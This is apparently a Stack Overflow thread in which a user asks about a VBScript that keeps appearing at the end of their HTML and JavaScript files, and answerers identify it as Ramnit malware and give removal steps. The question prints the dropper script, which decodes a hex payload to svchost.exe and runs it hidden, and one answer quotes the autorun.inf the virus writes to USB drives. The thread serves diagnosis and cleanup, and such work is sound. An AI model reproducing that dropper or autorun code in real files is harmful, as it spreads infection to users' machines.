2

Whenever I open a JavaScript (.js) Or HTML (.html) files after a few days in Notepad++, a similar VB script gets automatically added at the end. I strongly feel that this is some kind of virus, can anyone guide me on this?

</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- ޼ .... {Lots of junk characters here } -->
tryingToLearn
  • 10,691
  • 12
  • 80
  • 114
  • 1
    That looks like a virus appending code to your requests. Possibly your web host, or your ISP if these files are hosted online. It's overwriting your `svchost.exe` file, which every service runs under. – Blindy Jul 06 '15 at 13:02
  • 1
    Looks a lot like a virus, I get a few result by searching for that number "4D5A90000300000004000". The "number" is the code that will be ran. If you print out what is sent to FileObj.Write you might see the code. – the_lotus Jul 06 '15 at 13:02
  • @Blindy Overwriting svchost.exe sounds scary. – tryingToLearn Jul 06 '15 at 13:07
  • 1
    It's downright terrifying, you can do *anything* afterwards. And it's very hard to manually get rid of since simply starting Windows opens and locks `svchost.exe`. Good news is you probably don't need to, there's plenty of antivirus software out there. – Blindy Jul 06 '15 at 13:09
  • 1
    Every time I open this page I get a warning from Avast - it identifies the malware as `VBS:Agent-KZ [Trj]` - that may help in removing the trojan – Jaromanda X Jul 11 '15 at 15:53

4 Answers4

3

The file it runs is %temp%\svchost.exe.

Therefore do a tasklist

tasklist /svc /fi "imagename eq svchost.exe"

make a note of svchosts without any containing services. Put the actual PID in for xxxx

taskkill /pid xxxx /pid xxxx /pid xxxx /f

That will stop that particular part running.

The technique used by the virus won't work reliably especially on non english windows.

Also instead of deleting it change security to prevent execution untill you clean other parts that may exist.

icacls "%temp%\svchost.exe" /deny Everyone:F

This is for Vista but broadly applicable to all versions.

Virus Cleaning

If you have problems doing these in normal mode. Try doing it in Safe Mode with Networking.

Click Start - All Programs - Accessories - Run and type

msconfig

Then go to the Boot tab and click Safe Boot and also tick Network. Reboot. Come back here and untick Safe Boot to return to normal mode.

Safety Scanner

The Microsoft Safety Scanner is a free downloadable security tool that provides on-demand scanning and helps remove viruses, spyware, and other malicious software. It works with your existing antivirus software.

http://www.microsoft.com/security/scanner/en-au/default.aspx

Malicious Software Removal Tool

If you can't download or run the Safety Scanner, Windows has a tiny anti virus program built in. It only targets the most common threats. It will want to update, don't let it. Run it without updating. Then run it again updating it this time.

Click Start - All Programs - Accessories - Run (or press Winkey + R). Type

mrt

Reset Firewall

You can reset your firewall to default settings.

Start - All Programs - Accessories - Right click Command Prompt and choose Run As Administrator. Type (or copy and paste by right clicking in the Command Prompt window and choosing Paste).

netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"

Security Fixits

Fixits are troubleshooting programs from Microsoft. There are 27 of them.

Automatically fix Windows security settings to keep your PC safe

http://support.microsoft.com/mats/Malware_Prevention/en-us

and

Fix security issues to protect and secure Windows automatically

http://support.microsoft.com/mats/windows_security_diagnostic/en-us

and

Fix Internet Explorer issues to make IE fast, safe and stable

http://support.microsoft.com/mats/ie_performance_and_safety/en-us

For the full list visit

http://support.microsoft.com/fixit/en-us

When you choose to download it, choose the option to run on another computer. Then you can save it to your harddisk in a folder. Open the folder, open the folder Fix it Portable, and run Launch Fix It. It will contain all 27 Fixits.

Full Time Antivirus

For a permanent anti virus, we here in the forums notice a complete lack of problems for people using Microsoft Security Essentials.

http://www.microsoft.com/en-au/download/details.aspx?id=5201

If All Else Fails

This program from Microsoft boots another basic operating system to clean Windows. You need to put it on a USB or DVD and then boot from it.

http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

Look Up Detail On The Threat

Microsoft maintains an encyclopedia of virus information.

http://www.microsoft.com/security/portal/threat/threats.aspx

user5071892
  • 147
  • 2
2

I also think that your system has affected with some viruses. i want to share a link which i came across that match your question please go through, here i will post the link -->http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page

siva
  • 244
  • 2
  • 11
1

I think it is a virus.

So, you need to install antivirus software if you do not have one.

I recommend free: Microsoft Security Essentials or Avast.

Also, you could download special Antivirus Utility just for scan and not to installing it – Dr. Web CureIt!

Then make a full scan of your computer.

You should check all startup commands and remove all malicious ones. e.g. CCleaner Free could help you to check them.

UPD After cleaning and removing startup commands you could use sfc utility.

Microsoft Windows Resource Checker

Scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.

Run cmd with admin privileges and then run sfc /scannow command.

Community
  • 1
  • 1
Vlad DX
  • 4,200
  • 19
  • 28
  • Too late to deal with this by changing the startup commands, it's already replaced the executable services run under. You need a full blown antivirus sweep. – Blindy Jul 06 '15 at 13:11
  • You know, it usually helps me to deal with viruses manually :-) – Vlad DX Jul 06 '15 at 13:15
0

This is a virus called Win32.Ramnit read the description here:

https://www.virustotal.com/#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection

I have just discovered this virus at one of my client's computer and this virus modified all my html files in my USB Portable harddisk.

This script execute the VBScript to create a file and execute it and install a program at this folder:

C:\Program Files\Microsoft\DesktopLayer.exe

read more: http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm

and for every USB pendrive that you inserted into this infected pc, the virus will create 2 files:

autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe

The content of autorun.inf:

[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe

Which attempt to execute the virus installer when this pendrive is inserted into another computer.

mjb
  • 7,649
  • 8
  • 44
  • 60